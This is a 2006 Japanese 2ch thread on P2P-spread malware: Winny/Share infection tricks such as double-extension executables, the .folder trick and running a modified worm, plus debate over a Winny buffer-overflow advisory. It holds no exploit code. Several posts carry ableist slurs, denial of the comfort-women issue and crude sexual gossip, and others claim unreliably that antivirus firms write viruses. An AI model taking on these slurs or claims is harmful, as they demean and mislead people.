747 :[名無し]さん(bin+cue).rar:2006/04/16(日) 10:26:47 ID:PFtSo1Tk0
>>745
ここで扱ってるタイプに限るとそれは単に実行していないつもりなだけ。
高度な感染技術は使ってないからね。

スタートアップに放り込むやつは微妙だけど。

動画しか扱ってないから大丈夫とか言ってるやつもいるけど
"動画.avi.exe"を"動画.avi"に見せるのなんて基本過ぎて引っかかる方がどうかしてる。
ダブルクリックしても再生されないなーなんてのはウィルス踏んでるよ。

748 :[名無し]さん(bin+cue).rar:2006/04/16(日) 10:27:27 ID:Knmw1qQ30
>>746
システムフォルダやスタートアップを解凍先にできてしまう解凍ソフト使ってるとか
解凍後に解凍先を開く設定にしておいてexeを実行するように設定され
ている.folderが存在するを開いた場合とかな
画像などもエクスプローラでプレビューするだけで感染したりするときもあるぞ

749 :[名無し]さん(bin+cue).rar:2006/04/16(日) 10:41:50 ID:PFtSo1Tk0
俺は.folderを開くのも画像/動画のプレビューも実行だと思ってる。

750 :[名無し]さん(bin+cue).rar:2006/04/16(日) 13:07:12 ID:0KMqyzSz0
>>725
そんなもんITセキュリティー業界の常識じゃん
マッチポンプなんだよ

751 :[名無し]さん(bin+cue).rar:2006/04/16(日) 16:01:52 ID:rdj/K2VI0
.folderって最新Winパッチで対応してるよな?
普通に使ってたら感染しなくね?

752 :[名無し]さん(bin+cue).rar:2006/04/16(日) 16:40:43 ID:ZKaJiY140
>>736
バージョンは5.35でかなり古いやつなので
もしかしたら踏んでしまったかもしれないです、、

753 :[名無し]さん(bin+cue).rar:2006/04/16(日) 16:59:58 ID:H8QI8wTQ0
このスレですら、ウィルスの感染方法を理解してない奴がいるんだぞ。
セキュリティパッチ当てるのが普通なんてのは甘い。

754 :[名無し]さん(bin+cue).rar:2006/04/16(日) 19:15:04 ID:3llXuJim0
>>753
だな。
以前の職場にいた上司は、WindowsUpdateを自動更新するように
設定してあったパソコンを使ってたんだが、始まろうとすると毎回
キャンセルしてた。

「待ち時間が長くて仕事が中断されるから」って公言してたけれど、
いつもソリテアしかしてないのもバレてるって。勤務時間きっちり
に退社するから、残ってる社員がアップデートをやってあげてたよ。

755 :[名無し]さん(bin+cue).rar:2006/04/16(日) 19:39:14 ID:Pc8KPGTh0
>>754
やさしいなぁ、喪前

756 :[名無し]さん(bin+cue).rar:2006/04/16(日) 21:05:35 ID:vIlZgLNQ0
何か話ぶったぎって悪いんですが、聞いてもらえないでしょうか?
あるzipファイルを解析していただきたいのですが・・・・・・
そのファイルは、、、
↓金子のそのファイルのハッシュ
3bdc3acac20ff6d4da65827043a738da

何かパスかかっていたのですが、その解除方法のhtmlファイルとメモが添付され、解除しようにも解除出来ず、
ピカチュウに頼んでも、丸一日でパスを発見出来ず・・・・・・・。
これってcryzipに類似してるんものなのかな・・・・・っと思いまして・・・・・・・。
みなさんの意見を聞きたいです。
どうかお願いします。


757 :[名無し]さん(bin+cue).rar:2006/04/16(日) 21:07:13 ID:pJ31XNbx0
>>756
スレ違い

758 :756:2006/04/16(日) 21:09:20 ID:vIlZgLNQ0
>>757
あ、確かにスレ違いでした。
スマソ。
他行ってきます、。


759 :[名無し]さん(bin+cue).rar:2006/04/16(日) 21:57:21 ID:Vqn4+sv10
>>756
おまいウイルスに感染してないか

760 :[名無し]さん(bin+cue).rar:2006/04/16(日) 22:09:12 ID:rlB5keoO0
いや、アイコンはちゃんとしたやつだったし

761 :[名無し]さん(bin+cue).rar:2006/04/16(日) 22:13:02 ID:aJzJ0w5L0
>>760 おまいじゃないwww

762 :[名無し]さん(bin+cue).rar:2006/04/16(日) 22:41:06 ID:uT5pJ8Sh0
ダブルクリックしても開きませんでしたのでファイルが壊れてたみたいです。
     ,-‐、 _
      |__,,ニ=T
    ‖   ‖
     |__,、-‐''″
   (一般コミック・雑誌)
   [ジャンプ] [2006-14]
   DEATH NOTE page.99
   「二人」.zip
   



   .exe

763 :[名無し]さん(bin+cue).rar:2006/04/16(日) 22:52:14 ID:aJzJ0w5L0
>>762
いいえ、違います。
ダブルクリックして開かないということは、その「ファイル」は明らかに暗号化されています。

764 :756:2006/04/16(日) 23:29:10 ID:vIlZgLNQ0
>>759
すんません。全然見てなかったもので返答遅れました。

言い方は変かもしれませんが、かかってはいないと思うんですが、他人の意見も聞きたくなって書き込みさせていただきました。
亜種だった場合、こちらで検体と思われるファイルの情報も提出出来ると思ったもので・・・・。

765 :756:2006/04/16(日) 23:50:06 ID:vIlZgLNQ0
すいません。
自己解決したした。
スマソ。
m(_ _)m
ではでは・・・・。
(・ω・)ノシ

766 :[名無し]さん(bin+cue).rar:2006/04/16(日) 23:56:42 ID:aJzJ0w5L0
>>756>>765
最新版のウイルス定義ファイルをインストールしてから
アンチウイルスソフトでコンピュータを調べてください。

アンチウイルスソフトをインストールしていないなら、次の3つの
どれかを実行してウイルスに感染していないかを調べてください。

■Microsoft Windows 悪意のあるソフトウェアの削除ツール (KB890830)
http://www.microsoft.com/downloads/details.aspx?FamilyId=AD724AE0-E72D-4F54-9AB3-75B8EB148356&displaylang=ja
■シマンテック セキュリティチェックの「ウイルス検出」
http://security.symantec.com/sscv6/default.asp?productid=symhome&langid=jp&venid=sym
■トレンドマイクロ ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp

何かが見つかったら、おそらく↓でさらし者になっています。
http://ex14.2ch.net/test/read.cgi/news4vip/1145113344/


767 :[名無し]さん(bin+cue).rar:2006/04/17(月) 00:10:26 ID:Iud7tH0V0
>>764
あなたの名前トシヤさん?
トシヤさんだったら山田に感染してるよ

768 :756:2006/04/17(月) 00:11:26 ID:qhVcUz0K0
>>766
残念ながら山田ではない模様です。(wiki等に掲載されているものを見る限りでは・・・・。)
とりあえずウイルススキャンかけてみますが・・・・・・・何も出てこないのが落ちだと思います。


769 :756:2006/04/17(月) 00:13:14 ID:qhVcUz0K0
>>767
トシヤじゃないすね。
スマソ。

連投スマソ。

770 :[名無し]さん(bin+cue).rar:2006/04/17(月) 00:21:56 ID:Iud7tH0V0
人違いでしたか、すいません

771 :[名無し]さん(bin+cue).rar:2006/04/17(月) 00:26:38 ID:d9Yi62ds0
>>768 残念もなにもありませんって。マルウェアの種類によらず、感染していなければ
それが一番です。現時点では、シマンテックとトレンドマイクロのオンラインスキャンの
両方を試してなにも引っかからなければ、有名どころのマルウェアには感染していないと
いえそうです。Shareの新種は……トレンドマイクロのオンラインスキャンで引っかっかる
のかな?



772 :[名無し]さん(bin+cue).rar:2006/04/17(月) 01:07:32 ID://ykZkUr0
こっちのスレのほうが質問とあってるので、失礼します。
キンタマ系についてですが、
感染中に、アカウント名を○○○から×××に変えた場合って、
それ以降は×××のデスクトップとかでうpされてくのかな?


773 :[名無し]さん(bin+cue).rar:2006/04/17(月) 01:35:45 ID:mm/s3Lpk0
アカウント名を読んでうpするタイプならするだろう

774 :756:2006/04/17(月) 03:45:48 ID:qhVcUz0K0
>>771
そうですね。
分かりました。
変なこと書いてスマソ。

775 :[名無し]さん(bin+cue).rar:2006/04/17(月) 09:35:12 ID:KBc6luh30
>>772
ここはスレタイに書いてある通り、新しいウィルスの解析をするスレで上級者の集うスレ。
初心者の質問は初心者とか質問とかエスパーとかスレタイに書いてるところで汁

776 :[名無し]さん(bin+cue).rar:2006/04/17(月) 09:46:18 ID:wklF2R1O0
0413b550457817912539a37b76f466f1

777 :[名無し]さん(bin+cue).rar:2006/04/17(月) 10:55:53 ID:9evvdIoH0
シャレタマの解析しようとVPCにコピーしようとしたら間違ってメインOSで踏みました。

778 :[名無し]さん(bin+cue).rar:2006/04/17(月) 12:19:30 ID:uqWIV15N0
>>777
ファイルのドラッグ中に手が滑って、コレクションの上でドロップして実行してしまった俺には、
その気持ちは痛いほどわかる。・゚・(ノ∀`)・゚・。

779 :[名無し]さん(bin+cue).rar:2006/04/17(月) 13:05:03 ID:0hdH4n6r0
全然わからねえ。
右クリ使えばいいだけだろ。
つーか砂箱入れてねーのかよ。

780 :[名無し]さん(bin+cue).rar:2006/04/17(月) 13:14:09 ID:bbltgC//0
そもそもエクスプローラ使うなよ

781 :[名無し]さん(bin+cue).rar:2006/04/17(月) 13:20:28 ID:qHUKN6520
.folderを使用するのは antiny.? だけかも
systemフォルダにmsp〜.exeをドロップしやがった

ついでに(バイナリをちょっと書き換えた)山田も実行
127.0.0.1:8080でアクセスできんかったら再起動。

再起動後は無効にしておいたSAV10.2が見事に削除(妨害)してくれました


山田オルタナティブって2chへの書き込みを防げば有効的に使えるのにな

PCの全ドライブを見れるようにするとしたらwar-ftpdを使うかhttpd入れる必要があって
設定が面倒

山田オルタナティブであれば設定不要で見れるしデスクトップのSSも見られる (操作は不可能だけど)

782 :[名無し]さん(bin+cue).rar:2006/04/17(月) 13:36:40 ID:GP3A9qDg0
> 操作は不可能だけど
面倒どころの話じゃないなw

783 :777:2006/04/17(月) 14:04:04 ID:SGRBlI020
>>778
同志(´・∀・`)ハッケン!

>>779-780
ごもっともですじゃ。 VPCが重いから軽くするために終了させた直後ですた(´・ω・`)ショボーン

そんなわけでメインOSでシャレタマの解析中。(´・ω・`)セツナス

784 :[名無し]さん(bin+cue).rar:2006/04/17(月) 14:40:16 ID:IS33A7s60
>>783
報告パンツ脱いで待ってます

785 :びっこかたわきちがいめくらつんぼ白痴ウイルス:2006/04/17(月) 15:24:40 ID:niAS6u300
戦争中に男性しかいない軍隊につけこんで不当な暴利を上げていた
戦場淫売(朝鮮人従軍慰安婦)たちは、その不当な利得こそ返還す
るべきではないでしょうか?


786 :[名無し]さん(bin+cue).rar:2006/04/17(月) 15:54:07 ID:W0am8Vsx0
>>781
これか?
http://cross-breed.com/archives/200601281054.php

787 :びっこかたわきちがいめくらつんぼ白痴ウイルス:2006/04/17(月) 18:34:46 ID:niAS6u300
いまさら顔写真見てもしょうがないだろ
それより自宅では妻を何度も満足させ、外では摩耶を金切り声を上げてのたうち回らせた
そのオチンチンこそすごいと思うよ
想像では膣のなかでミミズのごとくうごめき太くてしかも長いはず
そういう逸物を持つと妻一人じゃ満足できないんだろ
一度オチンチンを拝んでみたいものだ

職場のトイレで「これがあの不倫キンタマか」と覗かれるので連れションも出来ない
家ではお灸のあと「このー」と引っ張られたたかれているらしい

788 :[名無し]さん(bin+cue).rar:2006/04/17(月) 19:49:02 ID:ePgC6U1u0
なにこれ小泉か

789 :この人はこんな馬鹿:2006/04/17(月) 23:02:02 ID:niAS6u300
   │ Winnyが危険であるというのは全くの間違いだ。
   │ ソフトウェアは常に人間が動かすものだ。
   └──v────────────────
         ∧_∧
         (@∀@-) 。oO(……ということにしたい)
       ._φ   ⊂)
     /旦/三/ /|
     | ̄ ̄ ̄ ̄ ̄| .|
     |          |/


790 :Owner:2006/04/17(月) 23:07:22 ID:8Cvu1dg00
TROJ_DROPPER.NK

791 :Owner:2006/04/17(月) 23:18:41 ID:8Cvu1dg00
TROJ_DROPPER.NK

792 :Owner:2006/04/17(月) 23:24:46 ID:8Cvu1dg00
Trojan.Sufiage.B

793 :[名無し]さん(bin+cue).rar:2006/04/17(月) 23:38:14 ID:0dCBcHIr0
>>790-792
これはひょっとしてコンピュータの前に座っているのはニュイルスか?

794 :[名無し]さん(bin+cue).rar:2006/04/18(火) 00:15:07 ID:9NszXIea0
なんらかの理由で頭がやられていて
奇怪な書き込みをするリアルウイルスは
よく2ちゃんでみかける

795 :[名無し]さん(bin+cue).rar:2006/04/18(火) 00:17:18 ID:2JYD1JA90
DROPPERってこの間どっかで拾ったな
中身確認するまえにノートン先生が持ってっちゃったけど
それの亜種か?

796 :Owner:2006/04/18(火) 00:27:33 ID:9ISorsR20
Trojan.Sufiage.B

797 :[名無し]さん(bin+cue).rar:2006/04/18(火) 00:28:55 ID:3oASPgQ80
test

798 :[名無し]さん(bin+cue).rar:2006/04/18(火) 03:44:58 ID:by+s84g+0
イオナズンにBitdefenderが対応しない件

検体の出し方が悪かったかな?チクリテンプレ希望

799 :[名無し]さん(bin+cue).rar:2006/04/18(火) 03:50:57 ID:6tJAm0nO0
>>798
http://pc8.2ch.net/test/read.cgi/sec/1141394768/15

800 :[名無し]さん(bin+cue).rar:2006/04/18(火) 08:58:39 ID:LfuS9Scl0
タスクマネージャ見て思ったんだが
なんかひとつのソフトウェアのメモリ使用量がありえないぐらい増えてるんだけど
nyウィルスでソフトウェアに寄生するニュイルスあったっけ?
メモリ使って60Mのやつが何故か1.7Gとか使用してるんだけど。


801 :ェォH:2006/04/18(火) 09:03:50 ID:lN48dJ/e0
Buzz_NewBd

802 :[名無し]さん(bin+cue).rar:2006/04/18(火) 10:17:14 ID:sCjEkdR90
>>798
Bitdefenderは検体提出してもメール帰ってきたことがない。
対応もかなり遅いし。

803 :[名無し]さん(bin+cue).rar:2006/04/18(火) 14:02:45 ID:lBYq9Uxe0
>>800
そのモジュールMClean.exeって名前じゃないか?

804 :[名無し]さん(bin+cue).rar:2006/04/18(火) 15:38:23 ID:j2nQL1Ym0
ttp://internet.watch.impress.co.jp/cda/news/2006/04/18/11686.html
Winnyの金子氏も開発に参画したコンテンツ配信システム「SkeedCast」

805 :[名無し]さん(bin+cue).rar:2006/04/18(火) 16:06:41 ID:BYP75PUZ0
>>798
イオナズンはなんかベンダーによってはウイルス扱いしないらしいんだわ
NODもそうなんだけど対応する気配がない

806 :[名無し]さん(bin+cue).rar:2006/04/18(火) 17:12:42 ID:qdnDpIpv0
ウィルス作者ももっとセンス良い香具師いないもんかねぇw

へんてこな文章書き込ませてるより、逆にすでに感染している
ウィルスを駆逐して健全なPCにしちゃうウィルスとか作ってみろよと
言いたいw

807 :セキュリティホールを突いて起動不能にするウイルス次々と出現:2006/04/18(火) 17:18:24 ID:Gc+pE/X20
まあ、サポートが切れても、98Xをいまだに使っている大多数の人は、何の行動も
起こさないでしょう。
ゾンビPCがたくさん増えるだけでしょう。

普通の人は、ハードが壊れたら買い換えますが、サポートが無くなっても、買い換
える事はしません。

、、、とここで、気がつきました。
OSがウイルス等にやられて、起動不能になれば、買い替えますね。買い替えを促進
するために、セキュリティホールを突いて98Xを起動不能にするウイルスやトロイ
などが、次々と出現か?

808 :[名無し]さん(bin+cue).rar:2006/04/18(火) 17:59:42 ID:u40zUsZg0
>>806 それがセンス良いウイルス?

809 :[名無し]さん(bin+cue).rar:2006/04/18(火) 18:02:38 ID:lBYq9Uxe0
>>806
@目新しさが無い
A意味が無い
Bセンスが無い

810 :[名無し]さん(bin+cue).rar:2006/04/18(火) 18:27:29 ID:vzg8YTku0
>>806に反応して・・・・・
最近の情報流出させたり掲示板に書き込ませるウイルスってたち悪いよな〜
個人的にはmagistrとかcihの方が(・∀・)モエッ

811 :[名無し]さん(bin+cue).rar:2006/04/18(火) 18:28:02 ID:kVyKAsID0
実は作者は10人もいない件

812 :[名無し]さん(bin+cue).rar:2006/04/18(火) 19:38:48 ID:tItGujJc0
>>798
http://qb5.2ch.net/test/read.cgi/sec2chd/1144519139/687

813 :[名無し]さん(bin+cue).rar:2006/04/19(水) 15:10:54 ID:cGgRzUpb0
右クリックしても 削除が無いし ゴミ箱持っていっても 入れられない
ファイルがあるのですが どうやって消せばよろしいのでしょうか?

814 :[名無し]さん(bin+cue).rar:2006/04/19(水) 15:26:53 ID:AJeAWwbZ0
>>813
忘れる。

815 :[名無し]さん(bin+cue).rar:2006/04/19(水) 15:27:50 ID:8qgf22jQ0
>>813
ファイルの詳細を書かないと何ともいえない。
どんなファイル名で日時とプロパティはどうなってるとか。

816 :[名無し]さん(bin+cue).rar:2006/04/19(水) 16:09:26 ID:IbCj1VIe0
>>813
Unlocker

817 :[名無し]さん(bin+cue).rar:2006/04/19(水) 17:08:20 ID:VUAodG2P0
ttp://www.mainichi-msn.co.jp/today/archive/news/2006/04/18/20060419k0000m010042000c.html
ウィニー:対策ソフト、産官学チームで開発へ 政府が決定

818 :[名無し]さん(bin+cue).rar:2006/04/19(水) 19:57:09 ID:Fhv85K480
まぁ〜た税金の無駄遣いか

819 :[名無し]さん(bin+cue).rar:2006/04/19(水) 20:33:47 ID:JhT0DtiW0
そんなんに金使うよりユーザの教育をした方が効くのにな。
ny以外のやつにも応用できるのに何でこういう方向に行かないんだろ。

つーかさ、ウィルス対策ソフトのバンドル禁止が一番先だと思うよ俺は。
ノートンとかが入ってるからセキュリティ万全なんて言って売ってるバカがいるけど
こんなの無知なユーザが無防備になるだけじゃん。

820 :[名無し]さん(bin+cue).rar:2006/04/19(水) 20:54:52 ID:WXKU24+Q0
>>819
体験版のまま3年入れっぱなしとかな

821 :d-61-215-190-060.cable.katch.ne.jp:2006/04/19(水) 21:22:45 ID:WOuSsv3L0
ワロタ

822 :Owner:2006/04/19(水) 21:26:05 ID:vtJmosaC0
http://hetare.pornzonehost.com/EDeN/014.jpg

823 :[名無し]さん(bin+cue).rar:2006/04/19(水) 21:30:35 ID:cXrR48dh0
  / ̄ ̄ ̄ /
 ./ ./ ̄/ / 
 'ー' _/ /
   /___ノ

    /''7 ./''7
   /__/ / /
  ___ノ / 
 /____,./ 

   / ̄/ 
  /  ゙ー-;
 /  /ー--'゙ 
/_/ 

    /''7 ./''7
   /__/ / /
  ___ノ / 
 /____,./ 


824 :[名無し]さん(bin+cue).rar:2006/04/19(水) 22:28:48 ID:zl99sF1L0
有料版しかないセキュリティソフトが幅を利かせてると、いつまで絶っても健全なネットは来ないね。
ネット利用者は、有料版より少し機能が少なくなるぐらいのフリー版があるセキュリティソフトを使わなくちゃいけない。
面倒だからといってセキュリティソフトを買ってはいけない。

825 :[名無し]さん(bin+cue).rar:2006/04/19(水) 22:32:55 ID:WX9cGALd0
何を言ってるんだか

826 :[名無し]さん(bin+cue).rar:2006/04/19(水) 22:37:42 ID:JhT0DtiW0
いや、別に買っても良いとは思うんだよね。

でもその際にあれらはセキュリティ対策を支援する道具に過ぎず
新種が苦手なことと人間がきちんと使ってやらないと
効果が出ないことをちゃんと教える必要がある。

827 :[名無し]さん(bin+cue).rar:2006/04/19(水) 22:47:55 ID:daK1uuf40
計算機を管理できない奴が管理したがるから。
管理できると思い込んでるから。

無知の知。
人間の脳みそなんか、2000年前から進化してねえってこった。

828 :[名無し]さん(bin+cue).rar:2006/04/19(水) 22:59:44 ID:hdvzpW4c0
>>827
2000年じゃあそう進化しないとおもう
進化って1万年とか100万年単位じゃないと変化はわからないんじゃないかと
根拠はないけど。

829 :[名無し]さん(bin+cue).rar:2006/04/19(水) 23:05:07 ID:JhT0DtiW0
>>827
一般の方々は管理する必要があると思ってません。

830 :[名無し]さん(bin+cue).rar:2006/04/20(木) 00:06:57 ID:NbPUVXkc0
いやー、あんまり難しいことやらせると売れなくなるじゃん。
「誰でも簡単にあーんなことやこーんなことができる」ってノリで
初心者に売りつけようとする態度を改めない限り、セキュリティ関
連のトラブルは今後も続くと思う。

もしくは穴の可能な限り少ないOSを普及させることだろうね。
ま、それでも人間を介した情報漏洩は無くならない悪寒。

831 :[名無し]さん(bin+cue).rar:2006/04/20(木) 01:04:33 ID:ZiH7/Gbp0
ttp://ascii24.com/news/announce/2006/04/19/661811-000.html
Winnyとセキリュティ、いまやるべきは何か?

832 :[名無し]さん(bin+cue).rar:2006/04/20(木) 01:35:37 ID:51iUIIZJ0
ま、誰でも簡単に安全に割れられるのが理想なんだろーけどな

833 :[名無し]さん(bin+cue).rar:2006/04/20(木) 09:22:23 ID:Xkzo2vGi0
>>831
除外リストにEXEを登録するだけでって嘘だな。 まぁそれもやらなくちゃならん設定ではあるが。

834 :[名無し]さん(bin+cue).rar:2006/04/20(木) 10:05:24 ID:X2lIn1KJ0
大手セキュリティソフト会社がウィルスを作ってるのは紛れも無い事実だろうな
ウィルスの心配が無くなって困るのはそういう人たちなんだから

835 :[名無し]さん(bin+cue).rar:2006/04/20(木) 10:48:27 ID:jwfs+MYs0
そんなの内部告発があったら終わりだろ
社員が個人的にってのはありそうだが

836 :[名無し]さん(bin+cue).rar:2006/04/20(木) 11:01:39 ID:tcTzPS8y0
その手の動かぬ証拠がnyで流れたらお祭りなんだけどな。

837 :[名無し]さん(bin+cue).rar:2006/04/20(木) 16:53:35 ID:yDk20Cv/0
情報漏洩を防ぐにはって、ほとんどの場合職員が自宅等外部に情報を持ち出した時点で漏洩だろうに。

838 :[名無し]さん(bin+cue).rar:2006/04/20(木) 18:37:18 ID:AeBWHaPQ0
>>831
ぴ、PDF化の達人とは片腹痛い・・・・・・

839 :[名無し]さん(bin+cue).rar:2006/04/20(木) 19:48:56 ID:mNZzqmEX0
まぁ対策するなら
家に情報を持ち帰られないように
の対策だな
出力関係全部取り払うか

どうせウィルスに引っかかるヤツは
スキルないからちょっと工夫すれば
何もできんだろ

840 :[名無し]さん(bin+cue).rar:2006/04/20(木) 21:37:01 ID:vgP3PLuE0
お偉いさんにはデータを社外に持ち出したこととデータが不特定多数に流出されることの違いがわからんのですよ

841 :[名無し]さん(bin+cue).rar:2006/04/20(木) 23:39:39 ID:dJuPL8Kq0
ttp://internet.watch.impress.co.jp/cda/news/2006/04/20/11729.html
「Winny」と「Share」で感染するAntinnyの新亜種、Symantecが警告

842 :[名無し]さん(bin+cue).rar:2006/04/21(金) 06:39:49 ID:exEvjAXc0
ぬるぽ?

843 :[名無し]さん(bin+cue).rar:2006/04/21(金) 07:57:31 ID:10wO7tTg0
>>841
>559

>>842
がっ

844 :[名無し]さん(bin+cue).rar:2006/04/21(金) 17:38:25 ID:fFcEoVWV0
Winny におけるバッファオーバーフローの脆弱性
ttp://jvn.jp/jp/JVN%2374294680/index.html

> 概要
> P2P ファイル共有(交換)ソフトウエアである Winny にはバッファオーバーフローの脆弱性が存在します。
>
> 影響を受けるシステム
>  - Winny 2.0 b7.1 およびそれ以前

> 想定される影響
> 遠隔の第三者から巧妙に細工されたパケットを送信されることにより、ソフトウェアが異常終了する可能性があります。



845 :[名無し]さん(bin+cue).rar:2006/04/21(金) 17:44:19 ID:6hO21GvZ0
こりゃ大ニュースじゃん。 この穴を突きまくるウイルスが登場すればnyネットワークは終焉かもな。
対策しようと思えば簡単だが大部分の奴らはそんなことしないだろう。

846 :[名無し]さん(bin+cue).rar:2006/04/21(金) 17:45:44 ID:l6IYUFUg0
そうけ?


847 :[名無し]さん(bin+cue).rar:2006/04/21(金) 17:49:16 ID:fFcEoVWV0
ttp://jvn.jp/jp/JVN%2374294680/182914/index.html

> Winnyの制作者の金子勇です。
> 私自身は、諸般の都合により、Winnyのアップデートおよび
> 脆弱性の具体的な検証が困難な状況にあります。
> ご利用はWinnyを十分ご理解の上でお願いします。
> なお、現時点では、具体的な攻撃方法が明らかではなく、
> また、Winnyは様々な部分でチェックをしているので、
> 私としては、仮にバッファーオーバーフローの脆弱性への攻撃を
> 想定した場合でも、これによりあらゆる任意のコードが実行が
> 可能という訳では無いと判断しております。



848 :[名無し]さん(bin+cue).rar:2006/04/21(金) 17:57:18 ID:6hO21GvZ0
まだ穴についてはよく分かってないってことか。 任意のコードが実行されないのなら脅威でもなんでもないね。
最悪OSがダウンしても再起動すればいいだけだし。

849 :[名無し]さん(bin+cue).rar:2006/04/21(金) 18:32:47 ID:1h+QYqRE0
P2P経由で感染、密かに接続を行うWin32.Poliposに注意を呼びかけ
http://live22x.2ch.net/test/read.cgi/news/1145611559/l50

850 :[名無し]さん(bin+cue).rar:2006/04/21(金) 20:48:30 ID:AoZOFReT0
>>849
記事読んでもさっぱり意味が分からないんだけど
誰か詳しく説明してくれ。

851 :[名無し]さん(bin+cue).rar:2006/04/21(金) 21:03:04 ID:chZoKKLm0
"回避策は「利用の中止」のみ"Winnyに脆弱性
http://tmp6.2ch.net/test/read.cgi/download/1145611336/l50

結局「落ちる」だけ・・・か?


852 :[名無し]さん(bin+cue).rar:2006/04/21(金) 21:07:17 ID:dNCSO6ze0
33 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:2006/04/21(金) 19:05:04 ID:fbK7KsPP0
54 名前:番組の途中ですが名無しです[sage] 投稿日:2006/04/21(金) 18:58:31.35 ID:UW7f3/qd0
確認したけどlark版のnyは問題ないな
47氏版の純正nyはエラー報告出して落ちる

34 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:2006/04/21(金) 19:06:03 ID:fbK7KsPP0
8 名前:番組の途中ですが名無しです[sage] 投稿日:2006/04/21(金) 19:04:19.41 ID:UW7f3/qd0
確認してないがny1ももちろん落ちるはず
元々nyはバッファチェックが不完全なので一定サイズのブロックデータ送られるとこうなるんだろう
有名な話なので今更脆弱性云々言われても驚かない人が大多数だろうね

853 :[名無し]さん(bin+cue).rar:2006/04/21(金) 21:35:59 ID:XLVsd0nI0
ログでよくみかける 〜バッファが溢れたためリンクを切断しました ってやつのことじゃね?

854 :[名無し]さん(bin+cue).rar:2006/04/21(金) 21:46:18 ID:mMq+f0iS0
nyが落ちるだけ?

855 :[名無し]さん(bin+cue).rar:2006/04/21(金) 21:51:51 ID:6qxFRMFi0
>>844
報告者が47氏本人なんですが^^;;;

856 :[名無し]さん(bin+cue).rar:2006/04/21(金) 22:28:36 ID:mGxlb3CH0
>>852
単にny接続先を落としたいだけなら、接続先のIP/ポートは自明なわけで
そこにある種のパケット連続発信してやれば…
nyの前に、多くの場合はルータ落とせるけどね

昔から常識

857 :[名無し]さん(bin+cue).rar:2006/04/21(金) 22:32:29 ID:5sAYl7l/0
誰もそんな古いVer使ってないし
クラック使ってる奴ぐらいだろう

俺の(゚*゚)アナルー舐めれ

858 :[名無し]さん(bin+cue).rar:2006/04/21(金) 23:56:32 ID:ReylAuOU0
影響を受けるシステム
 - Winny 2.0 b7.1 およびそれ以前

859 :[名無し]さん(bin+cue).rar:2006/04/22(土) 00:06:19 ID:odEUjdow0
影響を受けるつってもny落ちるだけなんでしょ

860 :[名無し]さん(bin+cue).rar:2006/04/22(土) 00:20:45 ID:S6hqQBJO0
>>859
隠してるんじゃないかって言ってるのがいるけど
どうなんだろう。

861 :[名無し]さん(bin+cue).rar:2006/04/22(土) 01:20:20 ID:ahfbUMkd0
>>855
> 報告者が47氏本人なんですが^^;;;

ベンダ情報は当然開発者の金子氏。
見つけたのはeEyeの鵜飼って人。

862 :[名無し]さん(bin+cue).rar:2006/04/22(土) 02:02:15 ID:BpYfysph0
落とせるって事はそれを利用して色々な事ができるかもしれんだろ

863 :[名無し]さん(bin+cue).rar:2006/04/22(土) 03:23:27 ID:/wjPFivO0
どこぞのOSと違って、オーバフローで落とせても、リモート行為とかはできない

> 一般的に、バッファオーバーフローの脆弱性は、悪用されると、
> 当該プログラムを実行しているユーザアカウントの権限で、
> ソフトウェアの異常な動作停止や、ウイルスの感染行動、スパイウェア
> やボットといった不正プログラムのインストールなどが行われる可能性
> があります。

IPAが言ってるのはガセ(一応、“一般的に”と注釈しているが)
リモートかけられるようなら、とっくにny崩壊にもって行ける


864 :[名無し]さん(bin+cue).rar:2006/04/22(土) 07:32:56 ID:HmQWRgPU0
小泉ウイルスがまた活動しだしてるな
古いタイプの書き込みが復活してるっぽい

865 :[名無し]さん(bin+cue).rar:2006/04/22(土) 11:47:25 ID:ahfbUMkd0
Winnyのセキュリティ・ホールは危険」,発見者が警告
ttp://itpro.nikkeibp.co.jp/article/NEWS/20060422/235987/

> eEyeの情報によると,今回のセキュリティ・ホールは,ファイル転送用ポートにおける
> 特定のコマンドに存在する。細工が施されたデータをファイル転送用ポートに送られると
> バッファ・オーバーフローが発生し,データに含まれる任意のプログラムがWinnyの
> 実行権限で実行される。その結果,Winnyが稼働するコンピュータを攻撃者に乗っ取られる
> 可能性がある。

> 実際,同社では今回のセキュリティ・ホールを突いてプログラムを実行できることを
> 確認したとしている。

> eEyeの情報によると,今回のセキュリティ・ホールは,一般的なヒープ・オーバーフローの
> セキュリティ・ホールであり,セキュリティ・ホールを突いて任意のプログラムを
> 実行することは容易であるという。


866 :[名無し]さん(bin+cue).rar:2006/04/22(土) 12:17:50 ID:yXmpuiZl0
アプリケーションフィルタリングでブロックするしかないな

867 :[名無し]さん(bin+cue).rar:2006/04/22(土) 12:57:28 ID:/wjPFivO0
> 実際,同社では今回のセキュリティ・ホールを突いてプログラムを実行できることを
> 確認したとしている。

どこの誰も、そう言った報告はしていないわけだが
とにかく使わせない方向にしたいわけで

868 :[名無し]さん(bin+cue).rar:2006/04/22(土) 14:01:01 ID:JA0DpubY0
米のeEyeがそういう報告をしているわけですが。
追試で確認したという報告はないけどね。

869 :[名無し]さん(bin+cue).rar:2006/04/22(土) 14:03:04 ID:ahfbUMkd0
Winny Remote Buffer Overflow Vulnerability
ttp://www.eeye.com/html/research/advisories/AD20060421.html

870 :[名無し]さん(bin+cue).rar:2006/04/22(土) 16:23:31 ID:Po12Ps4h0
ヤバス
乗っ取られて情報抜き取られた

871 :[名無し]さん(bin+cue).rar:2006/04/22(土) 16:54:15 ID:zySkGrq60
米軍の情報漏洩にびびるアメリカ
さすがに私物PCは使わんか

872 :[名無し]さん(bin+cue).rar:2006/04/22(土) 17:21:08 ID:YK17EqCE0
>>870
俺も俺も                         ( ゚д゚ )

873 :[名無し]さん(bin+cue).rar:2006/04/22(土) 17:25:59 ID:lN3N5rpP0
左を見ろ→                                                                                           ( ゚д゚ )<コッチハ右ダ

874 :[名無し]さん(bin+cue).rar:2006/04/22(土) 17:41:23 ID:7VG9MHBE0
顔文字スレはこっちだよ☆
http://tmp6.2ch.net/test/read.cgi/download/1145189214/

875 :[名無し]さん(bin+cue).rar:2006/04/22(土) 18:53:59 ID:/wjPFivO0
>>868-869
だからね、可能性があるというか「may allow(可能かもしれません)」
なんていう、ものすごく低レベルの記述しかないのだが。

dwordがコールできるといったって、βだからBOF発生時にわざと落とす仕様に
してあるだけで、リモートは無理だつーの。

876 :[名無し]さん(bin+cue).rar:2006/04/22(土) 20:33:52 ID:ahfbUMkd0
>>875
> dwordがコールできるといったって

